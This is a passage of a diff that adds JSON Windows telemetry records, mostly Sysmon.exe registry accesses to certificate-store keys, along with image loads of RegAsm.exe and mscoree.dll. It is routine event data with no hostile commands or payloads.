"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570863090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570863090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570863090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570863090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570863090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570863090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570863090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570863090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570863090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570863090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570863090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570863090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570863090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570863090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570863090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570863090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570863090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570863090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570863090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570863090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570863090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570863090000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "RegAsm.exe", + "image_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570861990000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "image_load", + "image_name": "mscoree.dll", + "image_path": "C:\\Windows\\SysWOW64\\mscoree.dll", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570862150000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570863240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570863240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570863240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570863240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570863240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570863240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570863240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570863240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570863240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570863240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570863240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570863240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570863240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570863240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570863240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570863240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570863240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570863240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570863240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570863240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570863240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570863240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570863240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570863400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570863400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570863400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570863400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570863400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570863400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570863400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570863400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570863400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570863400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570863400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570863400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570863400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570863400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570863400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570863400000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570863400000, + "unique_pid": 